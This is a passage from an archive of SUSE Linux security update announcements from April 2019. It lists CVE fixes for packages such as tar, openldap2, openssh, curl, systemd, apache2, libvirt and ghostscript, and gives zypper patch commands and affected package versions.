SUSE-SU-2019:0926-1 Rating: moderate References: #1120610 #1130496 Cross-References: CVE-2018-20482 CVE-2019-9923 Affected Products: SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 SUSE Linux Enterprise Module for Basesystem 15 ______________________________________________________________________________ An update that fixes two vulnerabilities is now available. Description: This update for tar fixes the following issues: Security issues fixed: - CVE-2019-9923: Fixed a denial of service while parsing certain archives with malformed extended headers in pax_decode_header() (bsc#1130496). - CVE-2018-20482: Fixed a denial of service when the '--sparse' option mishandles file shrinkage during read access (bsc#1120610). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-926=1 - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-926=1 Package List: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): tar-debuginfo-1.30-3.3.2 tar-debugsource-1.30-3.3.2 tar-tests-1.30-3.3.2 tar-tests-debuginfo-1.30-3.3.2 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (noarch): tar-backup-scripts-1.30-3.3.2 tar-doc-1.30-3.3.2 - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): tar-1.30-3.3.2 tar-debuginfo-1.30-3.3.2 tar-debugsource-1.30-3.3.2 tar-rmt-1.30-3.3.2 tar-rmt-debuginfo-1.30-3.3.2 - SUSE Linux Enterprise Module for Basesystem 15 (noarch): tar-lang-1.30-3.3.2 References: https://www.suse.com/security/cve/CVE-2018-20482.html https://www.suse.com/security/cve/CVE-2019-9923.html https://bugzilla.suse.com/1120610 https://bugzilla.suse.com/1130496 From sle-security-updates at lists.suse.com Wed Apr 10 13:15:32 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 10 Apr 2019 21:15:32 +0200 (CEST) Subject: SUSE-SU-2019:0929-1: moderate: Security update for xmltooling Message-ID: <20190410191532.8FC151013C@maintenance.suse.de> SUSE Security Update: Security update for xmltooling ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0929-1 Rating: moderate References: #1129537 Cross-References: CVE-2019-9628 Affected Products: SUSE Linux Enterprise Module for Server Applications 15 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for xmltooling fixes the following issues: Security issue fixed: - CVE-2019-9628: Fixed an improper handling of exception in XMLTooling library which could result in denial of service against the application using XMLTooling (bsc#1129537). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Server Applications 15: zypper in -t patch SUSE-SLE-Module-Server-Applications-15-2019-929=1 Package List: - SUSE Linux Enterprise Module for Server Applications 15 (aarch64 ppc64le s390x x86_64): libxmltooling-devel-1.6.4-3.3.2 libxmltooling7-1.6.4-3.3.2 libxmltooling7-debuginfo-1.6.4-3.3.2 xmltooling-debugsource-1.6.4-3.3.2 xmltooling-schemas-1.6.4-3.3.2 References: https://www.suse.com/security/cve/CVE-2019-9628.html https://bugzilla.suse.com/1129537 From sle-security-updates at lists.suse.com Wed Apr 10 13:16:06 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 10 Apr 2019 21:16:06 +0200 (CEST) Subject: SUSE-SU-2019:0928-1: moderate: Security update for xmltooling Message-ID: <20190410191606.DF1D21013C@maintenance.suse.de> SUSE Security Update: Security update for xmltooling ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0928-1 Rating: moderate References: #1129537 Cross-References: CVE-2019-9628 Affected Products: SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for xmltooling fixes the following issue: Security issue fixed: - CVE-2019-9628: Fixed an improper handling of exception in XMLTooling library which could result in denial of service against the application using XMLTooling (bsc#1129537). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-928=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-928=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-928=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-928=1 Package List: - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): libxmltooling-devel-1.5.6-3.9.1 xmltooling-debugsource-1.5.6-3.9.1 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): libxmltooling-devel-1.5.6-3.9.1 xmltooling-debugsource-1.5.6-3.9.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): libxmltooling6-1.5.6-3.9.1 libxmltooling6-debuginfo-1.5.6-3.9.1 xmltooling-debugsource-1.5.6-3.9.1 xmltooling-schemas-1.5.6-3.9.1 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): libxmltooling6-1.5.6-3.9.1 libxmltooling6-debuginfo-1.5.6-3.9.1 xmltooling-debugsource-1.5.6-3.9.1 xmltooling-schemas-1.5.6-3.9.1 References: https://www.suse.com/security/cve/CVE-2019-9628.html https://bugzilla.suse.com/1129537 From sle-security-updates at lists.suse.com Thu Apr 11 07:10:53 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Thu, 11 Apr 2019 15:10:53 +0200 (CEST) Subject: SUSE-SU-2019:0931-1: important: Security update for openldap2 Message-ID: <20190411131053.0A6F51013C@maintenance.suse.de> SUSE Security Update: Security update for openldap2 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0931-1 Rating: important References: #1031702 #1037396 #1041764 #1065083 #1073313 Cross-References: CVE-2017-17740 CVE-2017-9287 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP4 SUSE Linux Enterprise Server for SAP 12-SP3 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server for SAP 12-SP1 SUSE Linux Enterprise Server for SAP 12 SUSE Linux Enterprise Server 12-SP1-LTSS SUSE Linux Enterprise Server 12-LTSS SUSE Linux Enterprise Module for Legacy Software 12 ______________________________________________________________________________ An update that solves two vulnerabilities and has three fixes is now available. Description: This update for openldap2 fixes the following issues: Security issues fixed: - CVE-2017-9287: A double free vulnerability in the mdb backend during search with page size 0 was fixed (bsc#1041764). - CVE-2017-17740: Fixed a denial of service (slapd crash) via a member MODDN operation that could have been triggered when both the nops module and the memberof overlay are enabled (bsc#1073313). Non-security issues fixed: - Fix a regression in handling of non-blocking connections (bsc#1031702) - Fix an uninitialised variable that causes startup failure (bsc#1037396) - Fix libldap leaks socket descriptors issue (bsc#1065083) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP4: zypper in -t patch SUSE-SLE-SAP-12-SP4-2019-931=1 - SUSE Linux Enterprise Server for SAP 12-SP3: zypper in -t patch SUSE-SLE-SAP-12-SP3-2019-931=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-931=1 - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-931=1 - SUSE Linux Enterprise Server for SAP 12: zypper in -t patch SUSE-SLE-SAP-12-2019-931=1 - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-931=1 - SUSE Linux Enterprise Server 12-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-2019-931=1 - SUSE Linux Enterprise Module for Legacy Software 12: zypper in -t patch SUSE-SLE-Module-Legacy-12-2019-931=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP4 (ppc64le x86_64): compat-libldap-2_3-0-2.3.37-18.24.9.7 compat-libldap-2_3-0-debuginfo-2.3.37-18.24.9.7 - SUSE Linux Enterprise Server for SAP 12-SP3 (ppc64le x86_64): compat-libldap-2_3-0-2.3.37-18.24.9.7 compat-libldap-2_3-0-debuginfo-2.3.37-18.24.9.7 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): compat-libldap-2_3-0-2.3.37-18.24.9.7 compat-libldap-2_3-0-debuginfo-2.3.37-18.24.9.7 - SUSE Linux Enterprise Server for SAP 12-SP1 (ppc64le x86_64): compat-libldap-2_3-0-2.3.37-18.24.9.7 compat-libldap-2_3-0-debuginfo-2.3.37-18.24.9.7 libldap-2_4-2-2.4.41-18.24.9.1 libldap-2_4-2-debuginfo-2.4.41-18.24.9.1 openldap2-2.4.41-18.24.9.7 openldap2-back-meta-2.4.41-18.24.9.7 openldap2-back-meta-debuginfo-2.4.41-18.24.9.7 openldap2-client-2.4.41-18.24.9.1 openldap2-client-debuginfo-2.4.41-18.24.9.1 openldap2-client-debugsource-2.4.41-18.24.9.1 openldap2-debuginfo-2.4.41-18.24.9.7 openldap2-debugsource-2.4.41-18.24.9.7 - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): libldap-2_4-2-32bit-2.4.41-18.24.9.1 libldap-2_4-2-debuginfo-32bit-2.4.41-18.24.9.1 - SUSE Linux Enterprise Server for SAP 12 (x86_64): compat-libldap-2_3-0-2.3.37-18.24.9.7 compat-libldap-2_3-0-debuginfo-2.3.37-18.24.9.7 libldap-2_4-2-2.4.41-18.24.9.1 libldap-2_4-2-32bit-2.4.41-18.24.9.1 libldap-2_4-2-debuginfo-2.4.41-18.24.9.1 libldap-2_4-2-debuginfo-32bit-2.4.41-18.24.9.1 openldap2-2.4.41-18.24.9.7 openldap2-back-meta-2.4.41-18.24.9.7 openldap2-back-meta-debuginfo-2.4.41-18.24.9.7 openldap2-client-2.4.41-18.24.9.1 openldap2-client-debuginfo-2.4.41-18.24.9.1 openldap2-client-debugsource-2.4.41-18.24.9.1 openldap2-debuginfo-2.4.41-18.24.9.7 openldap2-debugsource-2.4.41-18.24.9.7 - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): libldap-2_4-2-2.4.41-18.24.9.1 libldap-2_4-2-debuginfo-2.4.41-18.24.9.1 openldap2-2.4.41-18.24.9.7 openldap2-back-meta-2.4.41-18.24.9.7 openldap2-back-meta-debuginfo-2.4.41-18.24.9.7 openldap2-client-2.4.41-18.24.9.1 openldap2-client-debuginfo-2.4.41-18.24.9.1 openldap2-client-debugsource-2.4.41-18.24.9.1 openldap2-debuginfo-2.4.41-18.24.9.7 openldap2-debugsource-2.4.41-18.24.9.7 - SUSE Linux Enterprise Server 12-SP1-LTSS (s390x x86_64): libldap-2_4-2-32bit-2.4.41-18.24.9.1 libldap-2_4-2-debuginfo-32bit-2.4.41-18.24.9.1 - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64): libldap-2_4-2-2.4.41-18.24.9.1 libldap-2_4-2-debuginfo-2.4.41-18.24.9.1 openldap2-2.4.41-18.24.9.7 openldap2-back-meta-2.4.41-18.24.9.7 openldap2-back-meta-debuginfo-2.4.41-18.24.9.7 openldap2-client-2.4.41-18.24.9.1 openldap2-client-debuginfo-2.4.41-18.24.9.1 openldap2-client-debugsource-2.4.41-18.24.9.1 openldap2-debuginfo-2.4.41-18.24.9.7 openldap2-debugsource-2.4.41-18.24.9.7 - SUSE Linux Enterprise Server 12-LTSS (s390x x86_64): libldap-2_4-2-32bit-2.4.41-18.24.9.1 libldap-2_4-2-debuginfo-32bit-2.4.41-18.24.9.1 - SUSE Linux Enterprise Module for Legacy Software 12 (aarch64 ppc64le s390x x86_64): compat-libldap-2_3-0-2.3.37-18.24.9.7 compat-libldap-2_3-0-debuginfo-2.3.37-18.24.9.7 References: https://www.suse.com/security/cve/CVE-2017-17740.html https://www.suse.com/security/cve/CVE-2017-9287.html https://bugzilla.suse.com/1031702 https://bugzilla.suse.com/1037396 https://bugzilla.suse.com/1041764 https://bugzilla.suse.com/1065083 https://bugzilla.suse.com/1073313 From sle-security-updates at lists.suse.com Thu Apr 11 13:09:28 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Thu, 11 Apr 2019 21:09:28 +0200 (CEST) Subject: SUSE-SU-2019:14016-1: moderate: Security update for openssh Message-ID: <20190411190928.6AA3AF7BB@maintenance.suse.de> SUSE Security Update: Security update for openssh ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:14016-1 Rating: moderate References: #1090671 #1115550 #1119183 #1121816 #1121821 #1131709 Cross-References: CVE-2019-6109 CVE-2019-6111 Affected Products: SUSE Linux Enterprise Point of Sale 11-SP3 SUSE Linux Enterprise Debuginfo 11-SP3 ______________________________________________________________________________ An update that solves two vulnerabilities and has four fixes is now available. Description: This update for openssh fixes the following issues: Security vulnerabilities addressed: - CVE-2019-6109: Fixed an character encoding issue in the progress display of the scp client that could be used to manipulate client output, allowing for spoofing during file transfers (bsc#1121816). - CVE-2019-6111: Properly validate object names received by the scp client to prevent arbitrary file overwrites when interacting with a malicious SSH server (bsc#1121821). Other issues fixed: - Fixed two race conditions in sshd relating to SIGHUP (bsc#1119183). - Returned proper reason for port forwarding failures (bsc#1090671). - Fixed SSHD termination of multichannel sessions with non-root users (bsc#1115550). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Point of Sale 11-SP3: zypper in -t patch sleposp3-openssh-14016=1 - SUSE Linux Enterprise Debuginfo 11-SP3: zypper in -t patch dbgsp3-openssh-14016=1 Package List: - SUSE Linux Enterprise Point of Sale 11-SP3 (i586): openssh-6.6p1-41.18.1 openssh-askpass-gnome-6.6p1-41.18.1 - SUSE Linux Enterprise Debuginfo 11-SP3 (i586 s390x x86_64): openssh-askpass-gnome-debuginfo-6.6p1-41.18.1 openssh-debuginfo-6.6p1-41.18.1 openssh-debugsource-6.6p1-41.18.1 References: https://www.suse.com/security/cve/CVE-2019-6109.html https://www.suse.com/security/cve/CVE-2019-6111.html https://bugzilla.suse.com/1090671 https://bugzilla.suse.com/1115550 https://bugzilla.suse.com/1119183 https://bugzilla.suse.com/1121816 https://bugzilla.suse.com/1121821 https://bugzilla.suse.com/1131709 From sle-security-updates at lists.suse.com Fri Apr 12 04:12:05 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 12 Apr 2019 12:12:05 +0200 (CEST) Subject: SUSE-SU-2019:0249-2: important: Security update for curl Message-ID: <20190412101205.CB8C9FCCF@maintenance.suse.de> SUSE Security Update: Security update for curl ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0249-2 Rating: important References: #1123371 #1123377 #1123378 Cross-References: CVE-2018-16890 CVE-2019-3822 CVE-2019-3823 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes three vulnerabilities is now available. Description: This update for curl fixes the following issues: Security issues fixed: - CVE-2019-3823: Fixed a heap out-of-bounds read in the code handling the end-of-response for SMTP (bsc#1123378). - CVE-2019-3822: Fixed a stack based buffer overflow in the function creating an outgoing NTLM type-3 message (bsc#1123377). - CVE-2018-16890: Fixed a heap buffer out-of-bounds read in the function handling incoming NTLM type-2 messages (bsc#1123371). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-249=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): curl-7.37.0-37.34.1 curl-debuginfo-7.37.0-37.34.1 curl-debugsource-7.37.0-37.34.1 libcurl4-32bit-7.37.0-37.34.1 libcurl4-7.37.0-37.34.1 libcurl4-debuginfo-32bit-7.37.0-37.34.1 libcurl4-debuginfo-7.37.0-37.34.1 References: https://www.suse.com/security/cve/CVE-2018-16890.html https://www.suse.com/security/cve/CVE-2019-3822.html https://www.suse.com/security/cve/CVE-2019-3823.html https://bugzilla.suse.com/1123371 https://bugzilla.suse.com/1123377 https://bugzilla.suse.com/1123378 From sle-security-updates at lists.suse.com Fri Apr 12 04:39:29 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 12 Apr 2019 12:39:29 +0200 (CEST) Subject: SUSE-SU-2019:0054-2: important: Security update for systemd Message-ID: <20190412103929.13AD6FDF0@maintenance.suse.de> SUSE Security Update: Security update for systemd ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0054-2 Rating: important References: #1068588 #1071558 #1113665 #1120323 Cross-References: CVE-2018-15686 CVE-2018-16864 CVE-2018-16865 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that solves three vulnerabilities and has one errata is now available. Description: This update for systemd fixes the following issues: * Fix security vulnerabilities CVE-2018-16864 and CVE-2018-16865 (bsc#1120323): Both issues were memory corruptions via attacker-controlled alloca which could have been used to gain root privileges by a local attacker. * Fix security vulnerability CVE-2018-15686 (bsc#1113665): A vulnerability in unit_deserialize of systemd used to allow an attacker to supply arbitrary state across systemd re-execution via NotifyAccess. This could have been used to improperly influence systemd execution and possibly lead to root privilege escalation. * Remedy 2048 character line-length limit in systemd-sysctl code that would cause parser failures if /etc/sysctl.conf contained lines that exceeded this length (bsc#1071558). * Fix a bug in systemd's core timer code that would cause timer looping under certain conditions, resulting in hundreds of syslog messages being written to the journal (bsc#1068588). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-54=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): libgudev-1_0-0-210-116.19.1 libgudev-1_0-0-32bit-210-116.19.1 libgudev-1_0-0-debuginfo-210-116.19.1 libgudev-1_0-0-debuginfo-32bit-210-116.19.1 libgudev-1_0-devel-210-116.19.1 libudev-devel-210-116.19.1 libudev1-210-116.19.1 libudev1-32bit-210-116.19.1 libudev1-debuginfo-210-116.19.1 libudev1-debuginfo-32bit-210-116.19.1 systemd-210-116.19.1 systemd-32bit-210-116.19.1 systemd-debuginfo-210-116.19.1 systemd-debuginfo-32bit-210-116.19.1 systemd-debugsource-210-116.19.1 systemd-devel-210-116.19.1 systemd-sysvinit-210-116.19.1 typelib-1_0-GUdev-1_0-210-116.19.1 udev-210-116.19.1 udev-debuginfo-210-116.19.1 - SUSE Linux Enterprise Server for SAP 12-SP1 (noarch): systemd-bash-completion-210-116.19.1 References: https://www.suse.com/security/cve/CVE-2018-15686.html https://www.suse.com/security/cve/CVE-2018-16864.html https://www.suse.com/security/cve/CVE-2018-16865.html https://bugzilla.suse.com/1068588 https://bugzilla.suse.com/1071558 https://bugzilla.suse.com/1113665 https://bugzilla.suse.com/1120323 From sle-security-updates at lists.suse.com Fri Apr 12 04:40:24 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 12 Apr 2019 12:40:24 +0200 (CEST) Subject: SUSE-SU-2019:0888-2: important: Security update for apache2 Message-ID: <20190412104024.23C07FDF0@maintenance.suse.de> SUSE Security Update: Security update for apache2 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0888-2 Rating: important References: #1122839 #1131239 #1131241 Cross-References: CVE-2018-17199 CVE-2019-0217 CVE-2019-0220 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes three vulnerabilities is now available. Description: This update for apache2 fixes the following issues: - CVE-2018-17199: A bug in Apache's "mod_session_cookie" lead to an issue where the module did not respect a cookie's expiry time. [bsc#1122839] * CVE-2019-0220: The Apache HTTP server did not use a consistent strategy for URL normalization throughout all of its components. In particular, consecutive slashes were not always collapsed. Attackers could potentially abuse these inconsistencies to by-pass access control mechanisms and thus gain unauthorized access to protected parts of the service. [bsc#1131241] * CVE-2019-0217: A race condition in Apache's "mod_auth_digest" when running in a threaded server could have allowed users with valid credentials to authenticate using another username, bypassing configured access control restrictions. [bsc#1131239] Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-888=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (noarch): apache2-doc-2.4.16-20.24.1 - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): apache2-2.4.16-20.24.1 apache2-debuginfo-2.4.16-20.24.1 apache2-debugsource-2.4.16-20.24.1 apache2-example-pages-2.4.16-20.24.1 apache2-prefork-2.4.16-20.24.1 apache2-prefork-debuginfo-2.4.16-20.24.1 apache2-utils-2.4.16-20.24.1 apache2-utils-debuginfo-2.4.16-20.24.1 apache2-worker-2.4.16-20.24.1 apache2-worker-debuginfo-2.4.16-20.24.1 References: https://www.suse.com/security/cve/CVE-2018-17199.html https://www.suse.com/security/cve/CVE-2019-0217.html https://www.suse.com/security/cve/CVE-2019-0220.html https://bugzilla.suse.com/1122839 https://bugzilla.suse.com/1131239 https://bugzilla.suse.com/1131241 From sle-security-updates at lists.suse.com Fri Apr 12 04:40:57 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 12 Apr 2019 12:40:57 +0200 (CEST) Subject: SUSE-SU-2019:0936-1: important: Security update for libvirt Message-ID: <20190412104057.06354FDF0@maintenance.suse.de> SUSE Security Update: Security update for libvirt ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0936-1 Rating: important References: #1081516 #1102604 #1104662 #1106420 #1108086 #1108395 #1112182 #1117058 #1118952 #1120813 #1123642 #1124667 #1125665 #1126325 #1127458 #1130129 Cross-References: CVE-2019-3840 Affected Products: SUSE Linux Enterprise Module for Server Applications 15 SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 SUSE Linux Enterprise Module for Basesystem 15 ______________________________________________________________________________ An update that solves one vulnerability and has 15 fixes is now available. Description: This update for libvirt provides the following fixes: Security issue fixed: - CVE-2019-3840: Fixed a null pointer dereference vulnerability in virJSONValueObjectHasKey function which could have resulted in a remote denial of service via the guest agent (bsc#1127458). Other issues addressed: - apparmor: reintroduce upstream lxc mount rules (bsc#1130129). - hook: encode incoming XML to UTF-8 before passing to lxml etree from string method (bsc#1123642). - supportconfig: collect rotated logs in /var/log/libvirt/* (bsc#1124667). - libxl: support Xen's max_grant_frames setting with maxGrantFrames attribute on the xenbus controller (bsc#1126325). - conf: added new 'xenbus' controller type - util: skip RDMA detection for non-PCI network devices (bsc#1112182). - qemu: don't use CAP_DAC_OVERRIDE capability if non-root (bsc#1125665). - qemu: fix issues related to restricted permissions on /dev/sev(bsc#1102604). - apparmor: add support for named profiles (bsc#1118952). - libxl: save current memory value after successful balloon (bsc#1120813). - apparmor: Fix ptrace rules. (bsc#1117058) - libxl: Add support for soft reset. (bsc#1081516) - libxl: Fix VM migration on busy hosts. (bsc#1108086) - qemu: Add support for SEV guests. (fate#325817) - util: Don't check for parallel iteration in hash-related functions. (bsc#1106420) - spec: Don't restart libvirt-guests when updating libvirt-client. (bsc#1104662) - Fix virNodeGetSEVInfo API crashing libvirtd on AMD SEV enabled hosts. (bsc#1108395) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Server Applications 15: zypper in -t patch SUSE-SLE-Module-Server-Applications-15-2019-936=1 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-936=1 - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-936=1 Package List: - SUSE Linux Enterprise Module for Server Applications 15 (aarch64 ppc64le s390x x86_64): libvirt-4.0.0-9.16.7 libvirt-admin-4.0.0-9.16.7 libvirt-admin-debuginfo-4.0.0-9.16.7 libvirt-client-4.0.0-9.16.7 libvirt-client-debuginfo-4.0.0-9.16.7 libvirt-daemon-4.0.0-9.16.7 libvirt-daemon-config-network-4.0.0-9.16.7 libvirt-daemon-config-nwfilter-4.0.0-9.16.7 libvirt-daemon-debuginfo-4.0.0-9.16.7 libvirt-daemon-driver-interface-4.0.0-9.16.7 libvirt-daemon-driver-interface-debuginfo-4.0.0-9.16.7 libvirt-daemon-driver-lxc-4.0.0-9.16.7 libvirt-daemon-driver-lxc-debuginfo-4.0.0-9.16.7 libvirt-daemon-driver-network-4.0.0-9.16.7 libvirt-daemon-driver-network-debuginfo-4.0.0-9.16.7 libvirt-daemon-driver-nodedev-4.0.0-9.16.7 libvirt-daemon-driver-nodedev-debuginfo-4.0.0-9.16.7 libvirt-daemon-driver-nwfilter-4.0.0-9.16.7 libvirt-daemon-driver-nwfilter-debuginfo-4.0.0-9.16.7 libvirt-daemon-driver-qemu-4.0.0-9.16.7 libvirt-daemon-driver-qemu-debuginfo-4.0.0-9.16.7 libvirt-daemon-driver-secret-4.0.0-9.16.7 libvirt-daemon-driver-secret-debuginfo-4.0.0-9.16.7 libvirt-daemon-driver-storage-4.0.0-9.16.7 libvirt-daemon-driver-storage-core-4.0.0-9.16.7 libvirt-daemon-driver-storage-core-debuginfo-4.0.0-9.16.7 libvirt-daemon-driver-storage-disk-4.0.0-9.16.7 libvirt-daemon-driver-storage-disk-debuginfo-4.0.0-9.16.7 libvirt-daemon-driver-storage-iscsi-4.0.0-9.16.7 libvirt-daemon-driver-storage-iscsi-debuginfo-4.0.0-9.16.7 libvirt-daemon-driver-storage-logical-4.0.0-9.16.7 libvirt-daemon-driver-storage-logical-debuginfo-4.0.0-9.16.7 libvirt-daemon-driver-storage-mpath-4.0.0-9.16.7 libvirt-daemon-driver-storage-mpath-debuginfo-4.0.0-9.16.7 libvirt-daemon-driver-storage-scsi-4.0.0-9.16.7 libvirt-daemon-driver-storage-scsi-debuginfo-4.0.0-9.16.7 libvirt-daemon-hooks-4.0.0-9.16.7 libvirt-daemon-lxc-4.0.0-9.16.7 libvirt-daemon-qemu-4.0.0-9.16.7 libvirt-debugsource-4.0.0-9.16.7 libvirt-devel-4.0.0-9.16.7 libvirt-doc-4.0.0-9.16.7 libvirt-lock-sanlock-4.0.0-9.16.7 libvirt-lock-sanlock-debuginfo-4.0.0-9.16.7 libvirt-nss-4.0.0-9.16.7 libvirt-nss-debuginfo-4.0.0-9.16.7 - SUSE Linux Enterprise Module for Server Applications 15 (aarch64 x86_64): libvirt-daemon-driver-storage-rbd-4.0.0-9.16.7 libvirt-daemon-driver-storage-rbd-debuginfo-4.0.0-9.16.7 - SUSE Linux Enterprise Module for Server Applications 15 (x86_64): libvirt-daemon-driver-libxl-4.0.0-9.16.7 libvirt-daemon-driver-libxl-debuginfo-4.0.0-9.16.7 libvirt-daemon-xen-4.0.0-9.16.7 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): libvirt-debugsource-4.0.0-9.16.7 wireshark-plugin-libvirt-4.0.0-9.16.7 wireshark-plugin-libvirt-debuginfo-4.0.0-9.16.7 - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): libvirt-debugsource-4.0.0-9.16.7 libvirt-libs-4.0.0-9.16.7 libvirt-libs-debuginfo-4.0.0-9.16.7 References: https://www.suse.com/security/cve/CVE-2019-3840.html https://bugzilla.suse.com/1081516 https://bugzilla.suse.com/1102604 https://bugzilla.suse.com/1104662 https://bugzilla.suse.com/1106420 https://bugzilla.suse.com/1108086 https://bugzilla.suse.com/1108395 https://bugzilla.suse.com/1112182 https://bugzilla.suse.com/1117058 https://bugzilla.suse.com/1118952 https://bugzilla.suse.com/1120813 https://bugzilla.suse.com/1123642 https://bugzilla.suse.com/1124667 https://bugzilla.suse.com/1125665 https://bugzilla.suse.com/1126325 https://bugzilla.suse.com/1127458 https://bugzilla.suse.com/1130129 From sle-security-updates at lists.suse.com Fri Apr 12 07:09:31 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 12 Apr 2019 15:09:31 +0200 (CEST) Subject: SUSE-SU-2019:0144-2: important: Security update for ghostscript Message-ID: <20190412130931.BAA55FDF0@maintenance.suse.de> SUSE Security Update: Security update for ghostscript ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0144-2 Rating: important References: #1122319 Cross-References: CVE-2019-6116 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for ghostscript to version 9.26a fixes the following issues: Security issue fixed: - CVE-2019-6116: subroutines within pseudo-operators must themselves be pseudo-operators (bsc#1122319) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-144=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): ghostscript-9.26a-23.19.1 ghostscript-debuginfo-9.26a-23.19.1 ghostscript-debugsource-9.26a-23.19.1 